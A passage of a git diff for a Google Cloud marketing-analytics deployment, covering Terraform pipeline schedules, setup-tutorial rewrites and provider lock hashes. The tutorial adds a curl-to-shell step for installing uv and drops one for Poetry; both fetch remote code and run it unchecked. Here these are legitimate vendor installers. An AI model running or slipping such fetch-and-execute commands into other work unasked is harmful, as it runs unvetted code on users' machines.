score feature engineering e.g. (["scroll_50", "scroll_90", "view_search_results", ..]) +non_ecomm_events_list = ["scroll_50", "view_search_results"] +# A target event for the lead score propensity feature engineering e.g. "login" +non_ecomm_target_event = "login" + +################### PIPELINE CONFIGURATIONS ################################## + +pipeline_configuration = { + feature-creation-auto-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-purchase-propensity = { + execution = { + schedule = { + state = "ACTIVE" + } + } + } + feature-creation-churn-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-customer-ltv = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-aggregated-value-based-bidding = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-lead-score-propensity = { + execution = { + schedule = { + state = "ACTIVE" + } + } + } + value_based_bidding = { + training = { + schedule = { + state = "PAUSED" + } + } + explanation = { + schedule = { + state = "PAUSED" + } + } + } + purchase_propensity = { + training = { + schedule = { + state = "ACTIVE" + } + } + prediction = { + schedule = { + state = "ACTIVE" + } + } + } + churn_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + auto_segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + propensity_clv = { + training = { + schedule = { + state = "PAUSED" + } + } + } + clv = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + lead_score_propensity = { + training = { + schedule = { + state = "ACTIVE" + } + } + prediction = { + schedule = { + state = "ACTIVE" + } + } + } + + gemini_insights = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + reporting_preparation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } +} #################### ML MODEL VARIABLES ################################# @@ -54,4 +218,4 @@ ga4_stream_id = "${MAJ_GA4_STREAM_ID}" project_owner_email = "${MAJ_DATAFORM_REPO_OWNER_EMAIL}" dataform_github_repo = "${MAJ_DATAFORM_GITHUB_REPO_URL}" -dataform_github_token = "GitHub access token generated for your forked dataform repo" +dataform_github_token = "${MAJ_DATAFORM_GITHUB_TOKEN}" diff --git a/infrastructure/cloudshell/tutorial.md b/infrastructure/cloudshell/tutorial.md index 964421cf..d4d2e519 100644 --- a/infrastructure/cloudshell/tutorial.md +++ b/infrastructure/cloudshell/tutorial.md @@ -3,7 +3,7 @@ ## Prerequisites Make sure you have completed all the steps under the [Prerequisites](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/tree/main/infrastructure#prerequisites) section. -## Choose your primary cloud project for MAJ +## Choose your primary cloud project for Marketing Analytics Jumpstart Set the default project id for `gcloud` @@ -12,22 +12,29 @@ export PROJECT_ID="" gcloud config set project $PROJECT_ID ``` -## Install Poetry -```sh -curl -sSL https://install.python-poetry.org | python3 - -``` -Add poetry to PATH +## Install update uv for running python scripts +Install [uv](https://docs.astral.sh/uv/) that manages the python version and dependecies for the solution. + ```sh -export PATH="$HOME/.local/bin:$PATH" +curl -LsSf https://astral.sh/uv/install.sh | sh +export PATH="$HOME/.local/bin:$PATH" ``` -Verify poetry is properly installed, run: + +Check uv installation ```sh -poetry --version +uv --version ``` -Install python dependencies, run: + +## Authenticate with additional OAuth 2.0 scopes ```sh -poetry install +gcloud auth login +gcloud auth application-default login --quiet --scopes="openid,https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/analytics,https://www.googleapis.com/auth/analytics.edit,https://www.googleapis.com/auth/analytics.provision,https://www.googleapis.com/auth/analytics.readonly,https://www.googleapis.com/auth/accounts.reauth" +gcloud auth application-default set-quota-project $PROJECT_ID +export GOOGLE_APPLICATION_CREDENTIALS=/Users//.config/gcloud/application_default_credentials.json ``` +**Note:** You may receive an error message informing the Cloud Resource Manager API has not been used/enabled for your project, similar to the following: +ERROR: (gcloud.auth.application-default.login) User [@.com] does not have permission to access projects instance [:testIamPermissions] (or it may not exist): Cloud Resource Manager API has not been used in project before or it is disabled. Enable it by visiting https://console.developers.google.com/apis/api/cloudresourcemanager.googleapis.com/overview?project= then retry. If you enabled this API recently, wait a few minutes for the action to propagate to our systems and retry. +On the next step, the Cloud Resource Manager API will be enabled and, then, your credentials will finally work. ## Set environment variables Run the set variable script and follow the steps to provide value for every variable: @@ -36,16 +43,29 @@ Run the set variable script and follow the steps to provide value for every vari ``` ## Create the Terraform variables file - ```sh envsubst < "${SOURCE_ROOT}/infrastructure/cloudshell/terraform-template.tfvars" > "${TERRAFORM_RUN_DIR}/terraform.tfvars" ``` Provide value for the `dataform_github_token` variable in the generated terraform.tfvars file -## Authenticate with additional OAuth 2.0 scopes + +## Review your Terraform version +Make sure you have installed terraform version is 1.9.7. We recommend you to use [tfenv](https://github.com/tfutils/tfenv) to manage your terraform version. +`Tfenv` is a version manager inspired by rbenv, a Ruby programming language version manager. +To install `tfenv`, run the following commands: +```sh +# Install via Homebrew or via Arch User Repository (AUR) +# Follow instructions on https://github.com/tfutils/tfenv +# Now, install the recommended terraform version +tfenv install 1.9.7 +tfenv use 1.9.7 +terraform --version +``` +For instance, the output on MacOS should be like: ```sh -. scripts/common.sh;set_application_default_credentials $(pwd);set +o nounset;set +o errexit +Terraform v1.9.7 +on darwin_amd64 ``` ## Create Terraform remote backend @@ -61,16 +81,37 @@ terraform init: terraform -chdir="${TERRAFORM_RUN_DIR}" init ``` -terraform apply: +terraform plan: ```sh -terraform -chdir="${TERRAFORM_RUN_DIR}" apply +terraform -chdir="${TERRAFORM_RUN_DIR}" plan ``` -## Create Looker Studio Dashboard -Extract the URL used to create the dashboard from the Terraform output value: +terraform validate: ```sh -echo "$(terraform -chdir=${TERRAFORM_RUN_DIR} output -raw lookerstudio_create_dashboard_url)" +terraform -chdir="${TERRAFORM_RUN_DIR}" validate ``` -1. Click on the long URL from the command output. This will take you to the copy dashboard flow in Looker Studio. -1. The copy may take a few moments to execute. If it does not, close the tab and try clicking the link again. -1. Click on the button `Edit and share` to follow through and finish the copy process. +If you run into errors, review and edit the configurations `${TERRAFORM_RUN_DIR}/terraform.tfvars` file. However, if there are still configurations errors, open a new [github issue](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/issues/). + +terraform apply: +```sh +terraform -chdir="${TERRAFORM_RUN_DIR}" apply +``` +If you don't have a successful execution of certain resources, re-run `terraform -chdir="${TERRAFORM_RUN_DIR}" apply` a few more times until all is deployed successfully. However, if there are still resources not deployed, open a new [github issue](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/issues/). + +## Resources created + +At this time, the Terraform scripts in this folder perform the following tasks: + +- Enables the APIs needed +- IAM bindings needed for the GCP services used +- Secret in GCP Secret manager for the private GitHub repo +- Dataform repository connected to the GitHub repo +- Deploys the marketing data store (MDS), feature store, ML pipelines and activation application + +## Next Steps + +Follow the [post-installation guide](./POST-INSTALLATION.md) to start you daily operations. + +It is recommended to follow the post-installation guide before deploying the Looker Studio Dashboard, because you need the data and predictions tables to exist before consuming insights in your reports. + +**The Looker Studio Dashboard deployment is a separate [step](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/python/lookerstudio/README.md).** diff --git a/infrastructure/terraform/.terraform.lock.hcl b/infrastructure/terraform/.terraform.lock.hcl index ece5c079..2840aece 100644 --- a/infrastructure/terraform/.terraform.lock.hcl +++ b/infrastructure/terraform/.terraform.lock.hcl @@ -2,145 +2,165 @@ # Manual edits may be lost in future updates. provider "registry.terraform.io/hashicorp/archive" { - version = "2.4.2" + version = "2.6.0" hashes = [ - "h1:G4v6F6Lhqlo3EKGBKEK/kJRhNcQiRrhEdUiVpBHKHOA=", - "h1:WfIjVbYA9s/uN2FwhGoiffT7CLFydy7MT1waFbt9YrY=", - "zh:08faed7c9f42d82bc3d406d0d9d4971e2d1c2d34eae268ad211b8aca57b7f758", - "zh:3564112ed2d097d7e0672378044a69b06642c326f6f1584d81c7cdd32ebf3a08", - "zh:53cd9afd223c15828c1916e68cb728d2be1cbccb9545568d6c2b122d0bac5102", - "zh:5ae4e41e3a1ce9d40b6458218a85bbde44f21723943982bca4a3b8bb7c103670", - "zh:5b65499218b315b96e95c5d3463ea6d7c66245b59461217c99eaa1611891cd2c", + "h1:Ou6XKWvpo7IYgZnrFJs5MKzMqQMEYv8Z2iHSJ2mmnFw=", + "h1:rYAubRk7UHC/fzYqFV/VHc+7VIY01ugCxauyTYCNf9E=", + "zh:29273484f7423b7c5b3f5df34ccfc53e52bb5e3d7f46a81b65908e7a8fd69072", + "zh:3cba58ec3aea5f301caf2acc31e184c55d994cc648126cac39c63ae509a14179", + "zh:55170cd17dbfdea842852c6ae2416d057fec631ba49f3bb6466a7268cd39130e", + "zh:7197db402ba35631930c3a4814520f0ebe980ae3acb7f8b5a6f70ec90dc4a388", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:7f45b35a8330bebd184c2545a41782ff58240ed6ba947274d9881dd5da44b02e", - "zh:87e67891033214e55cfead1391d68e6a3bf37993b7607753237e82aa3250bb71", - "zh:de3590d14037ad81fc5cedf7cfa44614a92452d7b39676289b704a962050bc5e", - "zh:e7e6f2ea567f2dbb3baa81c6203be69f9cd6aeeb01204fd93e3cf181e099b610", - "zh:fd24d03c89a7702628c2e5a3c732c0dede56fa75a08da4a1efe17b5f881c88e2", - "zh:febf4b7b5f3ff2adff0573ef6361f09b6638105111644bdebc0e4f575373935f", + "zh:8bf7fe0915d7fb152a3a6b9162614d2ec82749a06dba13fab3f98d33c020ec4f", + "zh:8ce811844fd53adb0dabc9a541f8cb43aacfa7d8e39324e4bd3592b3428f5bfb", + "zh:bca795bca815b8ac90e3054c0a9ab1ccfb16eedbb3418f8ad473fc5ad6bf0ef7", + "zh:d9355a18df5a36cf19580748b23249de2eb445c231c36a353709f8f40a6c8432", + "zh:dc32cc32cfd8abf8752d34f2a783de0d3f7200c573b885ecb64ece5acea173b4", + "zh:ef498e20391bf7a280d0fd6fd6675621c85fbe4e92f0f517ae4394747db89bde", + "zh:f2bc5226c765b0c8055a7b6207d0fe1eb9484e3ec8880649d158827ac6ed3b22", ] } provider "registry.terraform.io/hashicorp/external" { - version = "2.3.3" + version = "2.3.4" constraints = ">= 2.2.2" hashes = [ - "h1:H+3QlVPs/7CDa3I4KU/a23wYeGeJxeBlgvR7bfK1t1w=", - "h1:Qi72kOSrEYgEt5itloFhDfmiFZ7wnRy3+F74XsRuUOw=", - "zh:03d81462f9578ec91ce8e26f887e34151eda0e100f57e9772dbea86363588239", - "zh:37ec2a20f6a3ec3a0fd95d3f3de26da6cb9534b30488bc45723e118a0911c0d8", - "zh:4eb5b119179539f2749ce9de0e1b9629d025990f062f4f4dddc161562bb89d37", - "zh:5a31bb58414f41bee5e09b939012df5b88654120b0238a89dfd6691ba197619a", - "zh:6221a05e52a6a2d4f520ffe7cbc741f4f6080e0855061b0ed54e8be4a84eb9b7", + "h1:U6W8rgrdmR2pZ2cicFoGOSQ4GXuIf/4EK7s0vTJN7is=", + "h1:XWkRZOLKMjci9/JAtE8X8fWOt7A4u+9mgXSUjc4Wuyo=", + "zh:037fd82cd86227359bc010672cd174235e2d337601d4686f526d0f53c87447cb", + "zh:0ea1db63d6173d01f2fa8eb8989f0809a55135a0d8d424b08ba5dabad73095fa", + "zh:17a4d0a306566f2e45778fbac48744b6fd9c958aaa359e79f144c6358cb93af0", + "zh:298e5408ab17fd2e90d2cd6d406c6d02344fe610de5b7dae943a58b958e76691", + "zh:38ecfd29ee0785fd93164812dcbe0664ebbe5417473f3b2658087ca5a0286ecb", + "zh:59f6a6f31acf66f4ea3667a555a70eba5d406c6e6d93c2c641b81d63261eeace", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:8bb068496b4679bef625e4710d9f3432e301c3a56602271f04e60eadf7f8a94c", - "zh:94742aa5378bab626ce34f79bcef6a373e4f86ea7a8b762e9f71270a899e0d00", - "zh:a485831b5a525cd8f40e8982fa37da40ff70b1ae092c8b755fcde123f0b1238d", - "zh:a647ff16d071eabcabd87ea8183eb90a775a0294ddd735d742075d62fff09193", - "zh:b74710c5954aaa3faf262c18d36a8c2407862d9f842c63e7fa92fa4de3d29df6", - "zh:fa73d83edc92af2e551857594c2232ba6a9e3603ad34b0a5940865202c08d8d7", + "zh:ad0279dfd09d713db0c18469f585e58d04748ca72d9ada83883492e0dd13bd58", + "zh:c69f66fd21f5e2c8ecf7ca68d9091c40f19ad913aef21e3ce23836e91b8cbb5f", + "zh:d4a56f8c48aa86fc8e0c233d56850f5783f322d6336f3bf1916e293246b6b5d4", + "zh:f2b394ebd4af33f343835517e80fc876f79361f4688220833bc3c77655dd2202", + "zh:f31982f29f12834e5d21e010856eddd19d59cd8f449adf470655bfd19354377e", ] } provider "registry.terraform.io/hashicorp/google" { - version = "4.85.0" - constraints = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + constraints = ">= 3.43.0, >= 3.53.0, >= 4.83.0, >= 5.3.0, >= 5.22.0, 5.45.0, < 6.0.0, < 7.0.0" hashes = [ - "h1:OVJ7KHmd+XnpxTIRwqwXKasUha9q1rxnq6m5iiETmTM=", - "h1:aSRZcEKF2wOi/v24IA+k9J2Y7aKVV1cHi/R0V3EhxXQ=", - "zh:17d60a6a6c1741cf1e09ac6731433a30950285eac88236e623ab4cbf23832ca3", - "zh:1c70254c016439dbb75cab646b4beace6ceeff117c75d81f2cc27d41c312f752", - "zh:35e2aa2cc7ac84ce55e05bb4de7b461b169d3582e56d3262e249ff09d64fe008", - "zh:417afb08d7b2744429f6b76806f4134d62b0354acf98e8a6c00de3c24f2bb6ad", - "zh:622165d09d21d9a922c86f1fc7177a400507f2a8c4a4513114407ae04da2dd29", - "zh:7cdb8e39a8ea0939558d87d2cb6caceded9e21f21003d9e9f9ce648d5db0bc3a", - "zh:851e737dc551d6004a860a8907fda65118fc2c7ede9fa828f7be704a2a39e68f", - "zh:a331ad289a02a2c4473572a573dc389be0a604cdd9e03dd8dbc10297fb14f14d", - "zh:b67fd531251380decd8dd1f849460d60f329f89df3d15f5815849a1dd001f430", - "zh:be8785957acca4f97aa3e800b313b57d1fca07788761c8867c9bc701fbe0bdb5", - "zh:cb6579a259fe020e1f88217d8f6937b2d5ace15b6406370977a1966eb31b1ca5", + "h1:9IKgCIf3GQ0JME7w4xEtEWPQzKj9dK6VWaQGNfXhIq4=", + "h1:EE17hNaULEGzLdVIS3GC4DZj4aPyJQ78mGzkMpta41g=", + "h1:F2Wsx5YDJ5ekyuNCMXGhufgP3PxZYLEGKEBA2OAf1Dw=", + "h1:Ijl5ueA8/gIRLo9XVGaHYj5P678EBJ09e5AW1zdEGFM=", + "h1:O9Y/KFnZ9vd/fbdEN8sVUqJSwBQrnD41/gvcrq2tdjs=", + "h1:WYrT1NBB471ix+daiTUPlrv0v7iahjo+BtHow4XK20A=", + "h1:gL0Wix01r4w2MXddANosbMZPhJ424zjsNilBI74WKXM=", + "h1:kcBXXVUCtgMtfmGlocuFsDQ9ZwKv6wWieF9WGLnuzCA=", + "h1:oKwp4VjUV+imHTzU2ligRhTONMP64Vg7pO/+jOO9nog=", + "h1:uAE+iwYlGzeMoc8khSNyNbSFGJ+RTdPzzv28V0/f1TQ=", + "h1:unPNZWUQ9JCQhCFjLsvGBzO4w80wyMryr7ws3ZXkWXY=", + "zh:02916a209c660806a7ef30c3e404cd139705bdd401646791ac8876259d10d560", + "zh:3cd831a98d9de617d334be4885a253dcf7dfb54a383cf366482303fdd5fd7162", + "zh:42dfb0db08b7086f8de4f1d2f8326d3e07c99016ce6ca91f3d310458111acc97", + "zh:4a8cb3569e5006da3bc631bc340f0c6020f3d6140c4eb5821d92d0ff23fde2dd", + "zh:614e86cd8e793c8d622a869860f71dcedef783c1a72d754c8af919c1209b1f89", + "zh:7d42ec15014891c6b65c0115c2fc0e95066f71497ad9c56639f490f0922daa2c", + "zh:813d3f741280a75baea1bfb0eeaaf4c2910218bd7e3607749a1a86d89a17c4dd", + "zh:823a9133c1dc96d7069bb838438a4aa5bef1344aa9077521d129915f6371fe65", + "zh:98803e908ddf283a6967cc213b34bf0c04ba866a02a3e516db6462053625aad5", + "zh:bc47ab6583e549cd86f2fa6a69cdfdf85b795e1184b0e5e25b194bbf82377b32", + "zh:d0a8e77af1f1a1fab9f7867cc8b2b700dd988398093a7a3e3273dac6875c161a", "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", ] } provider "registry.terraform.io/hashicorp/google-beta" { - version = "4.85.0" - constraints = ">= 3.43.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + constraints = ">= 3.43.0, >= 4.83.0, 5.45.0, < 6.0.0, < 7.0.0" hashes = [ - "h1:YkCDGkP0AUZoNobLoxRnM52Pi4alYE9EFXalEu8p8E8=", - "h1:fYXttGgML+C0aEl3rkOiAyo0UizA6rz7VsvNLTw678U=", - "zh:40e9c7ec46955b4d79065a14185043a4ad6af8d0246715853fc5c99208b66980", - "zh:5950a9ba2f96420ea5335b543e315b1a47a705f9a9abfc53c6fec52d084eddcb", - "zh:5dfa98d32246a5d97e018f2b91b0e921cc6f061bc8591884f3b144f0d62f1c20", - "zh:628d0ca35c6d4c35077859bb0a5534c1de44f23a91e190f9c3f06f2358172e75", - "zh:6e78d54fd4de4151968149b4c3521f563a8b5c55aad423dba5968a9114b65ae4", - "zh:91c3bc443188638353285bd35b06d3a3b39b42b3b4cc0637599a430438fba2f7", - "zh:9e91b03363ebf39eea5ec0fbe7675f6979883aa9ad9a36664357d8513a007cf3", - "zh:db9a8d6bfe075fb38c260986ab557d40e8d18e5698c62956a6da8120fae01d59", - "zh:e41169c49f3bb53217905509e2ba8bb4680c373e1f54db7fac1b7f72943a1004", - "zh:f32f55a8af605afbc940814e17493ac83d9d66cd6da9bbc247e0a833a0aa37ec", + "h1:4Ug3VzAY+rejiYinoSsvisWomat2F5IpZFRb8CXRzno=", + "h1:4tLIUBTNcMxicJ89U+W4JBIYrJDbV4sDKQIUgVG/HVs=", + "h1:5NWFWsFEk30OAkbcFm1F2B5Y7KM1wUGSHUDwrTG5X1U=", + "h1:AXiaqADjiqomw0FIvP2PGR4D0am6oO6zCZ/acI//YaA=", + "h1:GJWwhG8GIwDTXEdMrmvUS24YUeqJjilWPKHSjfzqZ78=", + "h1:Nf7L8JCTfl6xqc4eTuMcmOZVbubuGRZ0r0JIzR3jSgo=", + "h1:OcHA9U65zEiu9JCJ3cbQ9Y2Flo8I+swaw3QHmrZ04Yo=", + "h1:WIl5hWBy0sM0Op4dguxXNaoiT9s+sY5DwbXKktMwBwA=", + "h1:YIkw3tr1L4958Q+eVY7mFL34hFefIMAI82jhJqYuT24=", + "h1:duMh4JmMbG1JOrJWuY1RWCITPHBH6QJwMuewBT5LzoU=", + "h1:hilteO1YL4/igM7wvzhJzVa/37cgrx7GRLxe7vP2Bsg=", + "zh:1320129b0f6d2de7c0245d76118d83c7cdd052bee4a0234eb40fe000c3c0227b", + "zh:18592f31650e697c25f42a6ec26c79f7da5406c92330593242584ade57040b87", + "zh:1c2dd6050c9cfc4e690de056dcf58b262ea7f85abfbe4b60ee44dd360ff2a1b2", + "zh:560d9398296e52bfd64ada49f4c4ad120d5e98b1d0d75b103b78213d66df3c03", + "zh:7ce05dd2026c6ba6c3ee232cb1d66da5e472f5f77b8a0b0c44e854c37d06eff8", + "zh:7ffa5c7ccc53d5dd910cadd8c24ab78641080fe07b4c08eb714f98d46f1aa710", + "zh:9e429cf5c48bf7260add3cf7515d59cb25154cc5b36edeee0515dffeecf2d79e", + "zh:a2a54c710870bcb4ed614842271284eef6574d2eb618dc5162db4208d3014375", + "zh:b69ba5e5539699dcd4f9fdbb4d2e424b93137bf1fc5b812cbe18d823b0f09fea", + "zh:d26415fb70b8c3c9a2596f4244b8a2983a9b024bb54d85ccd87f348a7802545c", + "zh:d538686883e77e63ee01bcfe09076709cfdf95ce58277645d43695b1d880f467", "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", - "zh:f6561a6badc3af842f9ad5bb926104954047f07cb90fadcca1357441cc67d91d", ] } provider "registry.terraform.io/hashicorp/local" { - version = "2.5.1" + version = "2.5.2" hashes = [ - "h1:8oTPe2VUL6E2d3OcrvqyjI4Nn/Y/UEQN26WLk5O/B0g=", - "h1:tjcGlQAFA0kmQ4vKkIPPUC4it1UYxLbg4YvHOWRAJHA=", - "zh:0af29ce2b7b5712319bf6424cb58d13b852bf9a777011a545fac99c7fdcdf561", - "zh:126063ea0d79dad1f68fa4e4d556793c0108ce278034f101d1dbbb2463924561", - "zh:196bfb49086f22fd4db46033e01655b0e5e036a5582d250412cc690fa7995de5", - "zh:37c92ec084d059d37d6cffdb683ccf68e3a5f8d2eb69dd73c8e43ad003ef8d24", - "zh:4269f01a98513651ad66763c16b268f4c2da76cc892ccfd54b401fff6cc11667", - "zh:51904350b9c728f963eef0c28f1d43e73d010333133eb7f30999a8fb6a0cc3d8", - "zh:73a66611359b83d0c3fcba2984610273f7954002febb8a57242bbb86d967b635", + "h1:JlMZD6nYqJ8sSrFfEAH0Vk/SL8WLZRmFaMUF9PJK5wM=", + "h1:p99F1AoV9z51aJ4EdItxz/vLwWIyhx/0Iw7L7sWSH1o=", + "zh:136299545178ce281c56f36965bf91c35407c11897f7082b3b983d86cb79b511", + "zh:3b4486858aa9cb8163378722b642c57c529b6c64bfbfc9461d940a84cd66ebea", + "zh:4855ee628ead847741aa4f4fc9bed50cfdbf197f2912775dd9fe7bc43fa077c0", + "zh:4b8cd2583d1edcac4011caafe8afb7a95e8110a607a1d5fb87d921178074a69b", + "zh:52084ddaff8c8cd3f9e7bcb7ce4dc1eab00602912c96da43c29b4762dc376038", + "zh:71562d330d3f92d79b2952ffdda0dad167e952e46200c767dd30c6af8d7c0ed3", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:7ae387993a92bcc379063229b3cce8af7eaf082dd9306598fcd42352994d2de0", - "zh:9e0f365f807b088646db6e4a8d4b188129d9ebdbcf2568c8ab33bddd1b82c867", - "zh:b5263acbd8ae51c9cbffa79743fbcadcb7908057c87eb22fd9048268056efbc4", - "zh:dfcd88ac5f13c0d04e24be00b686d069b4879cc4add1b7b1a8ae545783d97520", + "zh:805f81ade06ff68fa8b908d31892eaed5c180ae031c77ad35f82cb7a74b97cf4", + "zh:8b6b3ebeaaa8e38dd04e56996abe80db9be6f4c1df75ac3cccc77642899bd464", + "zh:ad07750576b99248037b897de71113cc19b1a8d0bc235eb99173cc83d0de3b1b", + "zh:b9f1c3bfadb74068f5c205292badb0661e17ac05eb23bfe8bd809691e4583d0e", + "zh:cc4cbcd67414fefb111c1bf7ab0bc4beb8c0b553d01719ad17de9a047adff4d1", ] } provider "registry.terraform.io/hashicorp/null" { - version = "3.2.2" + version = "3.2.3" + constraints = ">= 2.1.0" hashes = [ - "h1:vWAsYRd7MjYr3adj8BVKRohVfHpWQdvkIwUQ2Jf5FVM=", - "h1:zT1ZbegaAYHwQa+QwIFugArWikRJI9dqohj8xb0GY88=", - "zh:3248aae6a2198f3ec8394218d05bd5e42be59f43a3a7c0b71c66ec0df08b69e7", - "zh:32b1aaa1c3013d33c245493f4a65465eab9436b454d250102729321a44c8ab9a", - "zh:38eff7e470acb48f66380a73a5c7cdd76cc9b9c9ba9a7249c7991488abe22fe3", - "zh:4c2f1faee67af104f5f9e711c4574ff4d298afaa8a420680b0cb55d7bbc65606", - "zh:544b33b757c0b954dbb87db83a5ad921edd61f02f1dc86c6186a5ea86465b546", - "zh:696cf785090e1e8cf1587499516b0494f47413b43cb99877ad97f5d0de3dc539", - "zh:6e301f34757b5d265ae44467d95306d61bef5e41930be1365f5a8dcf80f59452", + "h1:+AnORRgFbRO6qqcfaQyeX80W0eX3VmjadjnUFUJTiXo=", + "h1:nKUqWEza6Lcv3xRlzeiRQrHtqvzX1BhIzjaOVXRYQXQ=", + "zh:22d062e5278d872fe7aed834f5577ba0a5afe34a3bdac2b81f828d8d3e6706d2", + "zh:23dead00493ad863729495dc212fd6c29b8293e707b055ce5ba21ee453ce552d", + "zh:28299accf21763ca1ca144d8f660688d7c2ad0b105b7202554ca60b02a3856d3", + "zh:55c9e8a9ac25a7652df8c51a8a9a422bd67d784061b1de2dc9fe6c3cb4e77f2f", + "zh:756586535d11698a216291c06b9ed8a5cc6a4ec43eee1ee09ecd5c6a9e297ac1", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:913a929070c819e59e94bb37a2a253c228f83921136ff4a7aa1a178c7cce5422", - "zh:aa9015926cd152425dbf86d1abdbc74bfe0e1ba3d26b3db35051d7b9ca9f72ae", - "zh:bb04798b016e1e1d49bcc76d62c53b56c88c63d6f2dfe38821afef17c416a0e1", - "zh:c23084e1b23577de22603cff752e59128d83cfecc2e6819edadd8cf7a10af11e", + "zh:9d5eea62fdb587eeb96a8c4d782459f4e6b73baeece4d04b4a40e44faaee9301", + "zh:a6355f596a3fb8fc85c2fb054ab14e722991533f87f928e7169a486462c74670", + "zh:b5a65a789cff4ada58a5baffc76cb9767dc26ec6b45c00d2ec8b1b027f6db4ed", + "zh:db5ab669cf11d0e9f81dc380a6fdfcac437aea3d69109c7aef1a5426639d2d65", + "zh:de655d251c470197bcbb5ac45d289595295acb8f829f6c781d4a75c8c8b7c7dd", + "zh:f5c68199f2e6076bce92a12230434782bf768103a427e9bb9abee99b116af7b5", ] } provider "registry.terraform.io/hashicorp/random" { - version = "3.6.2" + version = "3.6.3" + constraints = ">= 2.1.0" hashes = [ - "h1:R5qdQjKzOU16TziCN1vR3Exr/B+8WGK80glLTT4ZCPk=", - "h1:wmG0QFjQ2OfyPy6BB7mQ57WtoZZGGV07uAPQeDmIrAE=", - "zh:0ef01a4f81147b32c1bea3429974d4d104bbc4be2ba3cfa667031a8183ef88ec", - "zh:1bcd2d8161e89e39886119965ef0f37fcce2da9c1aca34263dd3002ba05fcb53", - "zh:37c75d15e9514556a5f4ed02e1548aaa95c0ecd6ff9af1119ac905144c70c114", - "zh:4210550a767226976bc7e57d988b9ce48f4411fa8a60cd74a6b246baf7589dad", - "zh:562007382520cd4baa7320f35e1370ffe84e46ed4e2071fdc7e4b1a9b1f8ae9b", - "zh:5efb9da90f665e43f22c2e13e0ce48e86cae2d960aaf1abf721b497f32025916", - "zh:6f71257a6b1218d02a573fc9bff0657410404fb2ef23bc66ae8cd968f98d5ff6", + "h1:Fnaec9vA8sZ8BXVlN3Xn9Jz3zghSETIKg7ch8oXhxno=", + "h1:f6jXn4MCv67kgcofx9D49qx1ZEBv8oyvwKDMPBr0A24=", + "zh:04ceb65210251339f07cd4611885d242cd4d0c7306e86dda9785396807c00451", + "zh:448f56199f3e99ff75d5c0afacae867ee795e4dfda6cb5f8e3b2a72ec3583dd8", + "zh:4b4c11ccfba7319e901df2dac836b1ae8f12185e37249e8d870ee10bb87a13fe", + "zh:4fa45c44c0de582c2edb8a2e054f55124520c16a39b2dfc0355929063b6395b1", + "zh:588508280501a06259e023b0695f6a18149a3816d259655c424d068982cbdd36", + "zh:737c4d99a87d2a4d1ac0a54a73d2cb62974ccb2edbd234f333abd079a32ebc9e", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:9647e18f221380a85f2f0ab387c68fdafd58af6193a932417299cdcae4710150", - "zh:bb6297ce412c3c2fa9fec726114e5e0508dd2638cad6a0cb433194930c97a544", - "zh:f83e925ed73ff8a5ef6e3608ad9225baa5376446349572c2449c0c0b3cf184b7", - "zh:fbef0781cb64de76b1df1ca11078aecba7800d82fd4a956302734999cfd9a4af", + "zh:a357ab512e5ebc6d1fda1382503109766e21bbfdfaa9ccda43d313c122069b30", + "zh:c51bfb15e7d52cc1a2eaec2a903ac2aff15d162c172b1b4c17675190e8147615", + "zh:e0951ee6fa9df90433728b96381fb867e3db98f66f735e0c3e24f8f16903f0ad", + "zh:e3cdcb4e73740621dabd82ee6a37d6cfce7fee2a03d8074df65086760f5cf556", + "zh:eff58323099f1bd9a0bec7cb04f717e7f1b2774c7d612bf7581797e1622613a0", ] } @@ -161,3 +181,23 @@ provider "registry.terraform.io/hashicorp/template" { "zh:c979425ddb256511137ecd093e23283234da0154b7fa8b21c2687182d9aea8b2", ] } + +provider "registry.terraform.io/hashicorp/time" { + version = "0.12.1" + hashes = [ + "h1:6BhxSYBJdBBKyuqatOGkuPKVenfx6UmLdiI13Pb3his=", + "h1:j+ED7j0ZFJ4EDx7sdna76wsiIf397toylDN0dFi6v0U=", + "zh:090023137df8effe8804e81c65f636dadf8f9d35b79c3afff282d39367ba44b2", + "zh:26f1e458358ba55f6558613f1427dcfa6ae2be5119b722d0b3adb27cd001efea", + "zh:272ccc73a03384b72b964918c7afeb22c2e6be22460d92b150aaf28f29a7d511", + "zh:438b8c74f5ed62fe921bd1078abe628a6675e44912933100ea4fa26863e340e9", + "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", + "zh:85c8bd8eefc4afc33445de2ee7fbf33a7807bc34eb3734b8eefa4e98e4cddf38", + "zh:98bbe309c9ff5b2352de6a047e0ec6c7e3764b4ed3dfd370839c4be2fbfff869", + 